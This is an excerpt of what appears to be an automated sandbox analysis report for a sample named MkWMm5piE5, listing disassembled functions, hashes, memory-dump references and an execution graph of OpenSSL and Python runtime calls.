                                                                                                                                                                                                                                                                          • Instruction ID: 59249bf1aa3a16270b7c7fe8be2f68ca6beebf10da9637f42f38635f30013b94
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F41F872B19A4695DB24DF69E4443A9B760FB88790FC04031DE9D877A8DF3CE441C791
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                          • Opcode ID: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
                                                                                                                                                                                                                                                                          • Instruction ID: 9614e6ff50ce2f6f906270463c4683ef62176fe7b0791543018bdaea55a70d11
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E421D762A0868381EB28AB19D45537DA3B1FB88B44FD14035D6ED432D4DF7CEA4587A3
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID: Error detected
                                                                                                                                                                                                                                                                          • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                                                                          • Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                                                                                                                                                                                                                                          • Instruction ID: 842d349dcdfe2c1b872aa2919b9b94d7336e4dfa80458e7bc1da2df83e01b772
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E521A6B2628A8781E728EB14F4916EAA364FF84784FC01135D69D47AB9DF3CD205CB91
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID: Fatal error detected
                                                                                                                                                                                                                                                                          • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                                                                          • Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                                                                                                                                                                                                                                          • Instruction ID: 6d8ca5fa2a5efad05502a9ee1064bfcbbea2625be1af2b74be49b967b846721a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5221A8B6628A8341E728EB18F4516EAA364FF84784FC01135D69D47AB9DF3CD205CB91
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                                                                                                                                                                                                                                          • Instruction ID: 8b3edefd35fbf5c5517305e5161faadeae9baa055a34e0a79bb8da7c51973e14
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB118F32618B4282EB699F19F440269B7E4FB88B84F984234DF9C077A9DF3CD555CB81
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                          • Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                                                                                                                                                                                                                                          • Instruction ID: 2db38a2ddd3630cd5d23fdafa4a9c3de5a3fb1630107b021007a3c70a441b9dd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2201716191860786FB2CBFA8956227EA290EF88709FC40035D56D466E5DE2CE504C6B7

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:0.8%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                          Signature Coverage:31%
                                                                                                                                                                                                                                                                          Total number of Nodes:210
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:22
                                                                                                                                                                                                                                                                          execution_graph 27893 7ffedd958ec3 27924 7ffedd9541e0 27893->27924 27895 7ffedd958f07 27896 7ffedd958f43 27895->27896 27901 7ffedd958f1e 27895->27901 27897 7ffedd958f69 27896->27897 27899 7ffedd958f60 _Py_Dealloc 27896->27899 27898 7ffedd958f81 27897->27898 27902 7ffedd958f78 _Py_Dealloc 27897->27902 27900 7ffedd958fa4 27898->27900 27904 7ffedd958f9e _Py_Dealloc 27898->27904 27899->27897 27906 7ffedd958fc7 27900->27906 27909 7ffedd958fc1 _Py_Dealloc 27900->27909 27903 7ffedd958f31 27901->27903 27905 7ffedd958f28 _Py_Dealloc 27901->27905 27902->27898 27904->27900 27905->27903 27908 7ffedd958fea 27906->27908 27910 7ffedd958fe4 _Py_Dealloc 27906->27910 27907 7ffedd95900d 27911 7ffedd959030 27907->27911 27915 7ffedd95902a _Py_Dealloc 27907->27915 27908->27907 27912 7ffedd959007 _Py_Dealloc 27908->27912 27909->27906 27910->27908 27913 7ffedd959053 27911->27913 27917 7ffedd95904d _Py_Dealloc 27911->27917 27912->27907 27914 7ffedd959076 27913->27914 27918 7ffedd959070 _Py_Dealloc 27913->27918 27916 7ffedd959099 27914->27916 27920 7ffedd959093 _Py_Dealloc 27914->27920 27915->27911 27919 7ffedd9590bc 27916->27919 27922 7ffedd9590b6 _Py_Dealloc 27916->27922 27917->27913 27918->27914 27921 7ffedd9590df 27919->27921 27923 7ffedd9590d9 _Py_Dealloc 27919->27923 27920->27916 27922->27919 27923->27921 27929 7ffedd95421a 27924->27929 27925 7ffedd9543ea 27925->27925 27932 7ffedd954430 PyLong_FromString 27925->27932 27934 7ffedd954471 27925->27934 27926 7ffedd95432f 27926->27925 27933 7ffedd9543a5 PyBytes_FromStringAndSize 27926->27933 27927 7ffedd9544b1 PyFloat_FromDouble 27931 7ffedd954614 27927->27931 27927->27934 27928 7ffedd9542d5 PyUnicode_FromStringAndSize 27930 7ffedd9542fd PyUnicode_InternInPlace 27928->27930 27928->27931 27929->27926 27929->27928 27930->27929 27931->27895 27932->27925 27932->27931 27933->27926 27933->27931 27934->27927 27937 7ffedd9544d7 27934->27937 27935 7ffedd954510 PyComplex_FromDoubles 27935->27931 27935->27937 27936 7ffedd954550 PyTuple_New 27936->27931 27938 7ffedd95453b 27936->27938 27937->27935 27937->27938 27938->27936 27940 7ffedd9545ac 27938->27940 27939 7ffedd9545c0 PyFrozenSet_New 27939->27931 27939->27940 27940->27931 27940->27939 27941 7ffedd9545f4 PySet_Add 27940->27941 27941->27931 27941->27940 27942 7ffedce47f00 27944 7ffedce47f24 27942->27944 27943 7ffedce48b5c 27944->27943 27978 7ffedce45ca0 27944->27978 27947 7ffedce47fd0 CRYPTO_malloc 27948 7ffedce47ff9 ERR_new ERR_set_debug ERR_set_error 27947->27948 27950 7ffedce4802d 27947->27950 27949 7ffedce48b0d 27948->27949 27987 7ffedce47cb0 CRYPTO_zalloc ERR_new ERR_set_debug ERR_set_error CRYPTO_free 27950->27987 27952 7ffedce485b7 27953 7ffedce485bb CRYPTO_free 27952->27953 27956 7ffedce485d7 CRYPTO_malloc 27952->27956 27953->27949 27955 7ffedce48836 CRYPTO_free ERR_new ERR_set_debug ERR_set_error 27955->27949 27956->27955 27957 7ffedce4887f strncmp 27956->27957 27959 7ffedce4897c 27957->27959 27960 7ffedce489d3 CRYPTO_free 27959->27960 27961 7ffedce489ed CRYPTO_free 27960->27961 27962 7ffedce48a09 OPENSSL_sk_new_null 27960->27962 27961->27949 27963 7ffedce48a32 OPENSSL_sk_num 27962->27963 27964 7ffedce48a16 CRYPTO_free 27962->27964 27965 7ffedce48aa3 27963->27965 27966 7ffedce48a3e 27963->27966 27964->27949 27968 7ffedce48ace CRYPTO_free 27965->27968 27973 7ffedce48ab6 OPENSSL_sk_push 27965->27973 27967 7ffedce48a50 OPENSSL_sk_value 27966->27967 27969 7ffedce48a89 OPENSSL_sk_delete 27966->27969 27971 7ffedce48a6f OPENSSL_sk_push 27966->27971 27967->27966 27967->27969 27970 7ffedce48af3 27968->27970 27972 7ffedce48a95 OPENSSL_sk_num 27969->27972 27975 7ffedce48b50 OPENSSL_sk_free 27970->27975 27976 7ffedce48af7 OPENSSL_sk_free 27970->27976 27971->27972 27974 7ffedce48a7e CRYPTO_free 27971->27974 27972->27965 27972->27967 27973->27965 27973->27974 27974->27975 27975->27949 27976->27949 27979 7ffedce3132a 27978->27979 27980 7ffedce45cba strncmp 27979->27980 27981 7ffedce45ce0 27980->27981 27982 7ffedce45cf7 strncmp 27980->27982 27985 7ffedce45da0 ERR_new ERR_set_debug ERR_set_error 27981->27985 27986 7ffedce45dd2 27981->27986 27982->27981 27983 7ffedce45d28 strncmp 27982->27983 27983->27981 27984 7ffedce45d56 strncmp 27983->27984 27984->27981 27985->27986 27986->27943 27986->27947 27987->27952 27988 7ffedd96252e 27989 7ffedd962543 27988->27989 27990 7ffedd962534 27988->27990 27996 7ffedd954640 PyImport_ImportModuleLevelObject 27989->27996 27990->27989 27991 7ffedd96253a _Py_Dealloc 27990->27991 27991->27989 27995 7ffedd96382e 27997 7ffedd9547fb 27996->27997 28000 7ffedd954683 27996->28000 28013 7ffedd953880 10 API calls 27997->28013 27998 7ffedd9546b0 PyObject_GetAttr 27999 7ffedd9546cb PyUnicode_FromFormat 27998->27999 27998->28000 28001 7ffedd9546ef PyObject_GetItem 27999->28001 28002 7ffedd95477b PyErr_Clear PyModule_GetFilenameObject PyUnicode_FromFormat PyErr_SetImportError 27999->28002 28000->27997 28000->27998 28000->28002 28003 7ffedd954735 PyObject_SetItem 28000->28003 28004 7ffedd95472d PyDict_SetItem 28000->28004 28007 7ffedd9547e7 28000->28007 28009 7ffedd954709 _Py_Dealloc 28000->28009 28010 7ffedd954748 _Py_Dealloc 28000->28010 28001->28000 28005 7ffedd9547c4 28002->28005 28008 7ffedd9547d3 28002->28008 28003->28000 28004->28000 28006 7ffedd9547ca _Py_Dealloc 28005->28006 28005->28008 28006->28008 28007->27997 28012 7ffedd9547f2 _Py_Dealloc 28007->28012 28008->28007 28011 7ffedd9547de _Py_Dealloc 28008->28011 28009->28000 28010->28000 28011->28007 28012->27997 28013->27995 28014 7ffedce4ffe0 28015 7ffedce4fff0 28014->28015 28016 7ffedce50000 ERR_new ERR_set_debug ERR_set_error 28015->28016 28017 7ffedce5003b 28015->28017 28018 7ffedce50075 ASYNC_get_current_job 28017->28018 28019 7ffedce5007f 28017->28019 28018->28019 28020 7ffedce4d040 28021 7ffedce4d3c0 28020->28021 28022 7ffedce4d049 28020->28022 28022->28021 28023 7ffedce4d090 CRYPTO_free CRYPTO_free 28022->28023 28024 7ffedce4d0df 28023->28024 28025 7ffedce4d0e9 7 API calls 28023->28025 28024->28025 28044 7ffedce311e0 28025->28044 28027 7ffedce4d142 OPENSSL_sk_pop_free OPENSSL_sk_pop_free OPENSSL_sk_pop_free OPENSSL_sk_free 28028 7ffedce4d196 28027->28028 28029 7ffedce4d1a2 CRYPTO_free CRYPTO_free CRYPTO_free CRYPTO_free CRYPTO_secure_free 28028->28029 28030 7ffedce4d240 28029->28030 28031 7ffedce4d22b EVP_MD_get0_provider 28029->28031 28033 7ffedce4d261 28030->28033 28034 7ffedce4d24c EVP_MD_get0_provider 28030->28034 28031->28030 28032 7ffedce4d238 EVP_MD_free 28031->28032 28032->28030 28036 7ffedce4d278 EVP_CIPHER_get0_provider 28033->28036 28038 7ffedce4d297 28033->28038 28034->28033 28035 7ffedce4d259 EVP_MD_free 28034->28035 28035->28033 28036->28033 28037 7ffedce4d285 EVP_CIPHER_free 28036->28037 28037->28033 28039 7ffedce4d2ac EVP_MD_get0_provider 28038->28039 28041 7ffedce4d2cb 28038->28041 28039->28038 28040 7ffedce4d2b9 EVP_MD_free 28039->28040 28040->28038 28042 7ffedce4d34a CRYPTO_free CRYPTO_free CRYPTO_THREAD_lock_free CRYPTO_free CRYPTO_free 28041->28042 28043 7ffedce4d2e1 CRYPTO_free CRYPTO_free CRYPTO_free 28041->28043 28042->28021 28043->28042 28043->28043 28044->28027 28046 7ffedce43de0 28044->28046 28045 7ffedce43f3f 28045->28027 28046->28045 28047 7ffedce43e10 EVP_PKEY_free 28046->28047 28048 7ffedce43e33 X509_free EVP_PKEY_free OPENSSL_sk_pop_free CRYPTO_free 28047->28048 28048->28048 28049 7ffedce43e87 CRYPTO_free CRYPTO_free CRYPTO_free X509_STORE_free X509_STORE_free 28048->28049 28050 7ffedce318f2 28049->28050 28051 7ffedce43ef6 CRYPTO_free CRYPTO_THREAD_lock_free CRYPTO_free 28050->28051 28051->28045 28052 7ffedcbb1490 GetSystemInfo 28053 7ffedcbb14c4 28052->28053 28054 7ffedce8f2d0 28060 7ffedce8f2ec 28054->28060 28055 7ffedce8f382 ERR_new ERR_set_debug 28058 7ffedce8f5b1 28055->28058 28056 7ffedce8f665 28057 7ffedce8f671 ERR_new 28056->28057 28056->28058 28059 7ffedce8f67b ERR_set_debug 28057->28059 28059->28058 28060->28055 28060->28056 28060->28058 28061 7ffedce8f64c 28060->28061 28063 7ffedce8f633 28060->28063 28065 7ffedce8f5ea 28060->28065 28062 7ffedce8f656 ERR_new 28061->28062 28062->28056 28064 7ffedce8f63d ERR_new 28063->28064 28064->28061 28065->28058 28066 7ffedce8f604 ERR_new 28065->28066 28066->28059 28067 7ffedce8e8a0 28071 7ffedce8e8ba 28067->28071 28068 7ffedce8eb60 ERR_new 28069 7ffedce8eb6a ERR_set_debug 28068->28069 28074 7ffedce8ebb7 28069->28074 28070 7ffedce8ebf1 ERR_new 28070->28069 28071->28068 28071->28070 28072 7ffedce8ebd6 28071->28072 28071->28074 28076 7ffedce8ec00 ERR_new ERR_set_debug 28071->28076 28077 7ffedce8ea1e BUF_MEM_grow_clean 28071->28077 28078 7ffedce8eb8d ERR_new ERR_set_debug 28071->28078 28080 7ffedce31c67 28071->28080 28073 7ffedce8ebe2 ERR_new 28072->28073 28072->28074 28075 7ffedce8eb2d ERR_set_debug 28073->28075 28075->28074 28076->28074 28077->28071 28077->28078 28078->28074 28080->28071 28081 7ffedce95b00 28080->28081 28082 7ffedce95b3c 28081->28082 28083 7ffedce95b97 ERR_clear_error OPENSSL_sk_value X509_get0_pubkey 28081->28083 28086 7ffedce95b54 ERR_new ERR_set_debug 28081->28086 28082->28071 28084 7ffedce95d26 ERR_new ERR_set_debug 28083->28084 28085 7ffedce95bd2 28083->28085 28087 7ffedce95d4e 28084->28087 28085->28084 28088 7ffedce95be2 28085->28088 28089 7ffedce95b7c 28086->28089 28087->28071 28090 7ffedce95bf7 ERR_new ERR_set_debug 28088->28090 28091 7ffedce95c24 28088->28091 28089->28071 28090->28087 28092 7ffedce95c81 X509_free X509_up_ref 28091->28092 28093 7ffedce95c54 ERR_new ERR_set_debug 28091->28093 28094 7ffedce95cce 28092->28094 28093->28087 28094->28071 28095 7ffedcea1360 28096 7ffedcea1378 28095->28096 28097 7ffedcea14bd 28096->28097 28099 7ffedcea1486 ERR_new ERR_set_debug 28096->28099 28100 7ffedcea14b6 28096->28100 28098 7ffedcea151e ERR_new ERR_set_debug 28097->28098 28097->28100 28098->28100 28099->28100 28101 7ffedce314ec 28102 7ffedce77d30 28101->28102 28103 7ffedce77e07 28102->28103 28104 7ffedce77de9 memmove 28102->28104 28114 7ffedce77e24 28102->28114 28105 7ffedce77e8c ERR_new ERR_set_debug 28103->28105 28109 7ffedce77ec8 28103->28109 28103->28114 28104->28103 28105->28114 28106 7ffedce77ef0 SetLastError 28107 7ffedce77f08 BIO_read 28106->28107 28108 7ffedce78007 ERR_new ERR_set_debug 28106->28108 28107->28109 28108->28114 28109->28106 28110 7ffedce77f81 28109->28110 28109->28114 28111 7ffedce77f97 BIO_ctrl 28110->28111 28110->28114 28112 7ffedce77fb1 28111->28112 28111->28114 28113 7ffedce77fd3 ERR_new ERR_set_debug 28112->28113 28112->28114 28113->28114

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 7ffedce4d040-7ffedce4d043 1 7ffedce4d3c5 0->1 2 7ffedce4d049-7ffedce4d06a call 7ffedce3132a 0->2 5 7ffedce4d3c0-7ffedce4d3c4 2->5 6 7ffedce4d070-7ffedce4d0dd call 7ffedcead35f CRYPTO_free * 2 2->6 5->1 9 7ffedce4d0df-7ffedce4d0e4 call 7ffedce31da7 6->9 10 7ffedce4d0e9-7ffedce4d13d CRYPTO_free_ex_data OPENSSL_LH_free X509_STORE_free CTLOG_STORE_free OPENSSL_sk_free * 3 call 7ffedce311e0 6->10 9->10 13 7ffedce4d142-7ffedce4d229 OPENSSL_sk_pop_free * 3 OPENSSL_sk_free call 7ffedce31811 call 7ffedce31032 CRYPTO_free * 4 CRYPTO_secure_free 10->13 18 7ffedce4d240-7ffedce4d24a 13->18 19 7ffedce4d22b-7ffedce4d236 EVP_MD_get0_provider 13->19 21 7ffedce4d261-7ffedce4d26e 18->21 22 7ffedce4d24c-7ffedce4d257 EVP_MD_get0_provider 18->22 19->18 20 7ffedce4d238-7ffedce4d23b EVP_MD_free 19->20 20->18 24 7ffedce4d270-7ffedce4d276 21->24 22->21 23 7ffedce4d259-7ffedce4d25c EVP_MD_free 22->23 23->21 25 7ffedce4d28d-7ffedce4d295 24->25 26 7ffedce4d278-7ffedce4d283 EVP_CIPHER_get0_provider 24->26 25->24 28 7ffedce4d297-7ffedce4d29e 25->28 26->25 27 7ffedce4d285-7ffedce4d288 EVP_CIPHER_free 26->27 27->25 29 7ffedce4d2a4-7ffedce4d2aa 28->29 30 7ffedce4d2c1-7ffedce4d2c9 29->30 31 7ffedce4d2ac-7ffedce4d2b7 EVP_MD_get0_provider 29->31 30->29 33 7ffedce4d2cb-7ffedce4d2dc 30->33 31->30 32 7ffedce4d2b9-7ffedce4d2bc EVP_MD_free 31->32 32->30 34 7ffedce4d2de 33->34 35 7ffedce4d34a-7ffedce4d3bb CRYPTO_free * 2 CRYPTO_THREAD_lock_free CRYPTO_free * 2 33->35 36 7ffedce4d2e1-7ffedce4d348 CRYPTO_free * 3 34->36 35->5 36->35 36->36
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: O_free$L_sk_free$D_freeD_get0_providerL_sk_pop_free$E_free$D_lock_freeH_freeO_free_ex_dataO_secure_freeR_freeR_get0_providerX509_
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_lib.c
                                                                                                                                                                                                                                                                          • API String ID: 234229340-1080266419
                                                                                                                                                                                                                                                                          • Opcode ID: e8453636a9e43eac99450ed27d159062f17b38c319a9f726d3fb4c5f11c0aae6
                                                                                                                                                                                                                                                                          • Instruction ID: 93b2b63897f3db8b91202e1c77a61e858a52869ad465a03b78979966b93f247a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8453636a9e43eac99450ed27d159062f17b38c319a9f726d3fb4c5f11c0aae6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 779122A1B5864298EB40AF69D9512FC2351EF85FC4F0C1037DD0DABEAADE2EE1478351
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
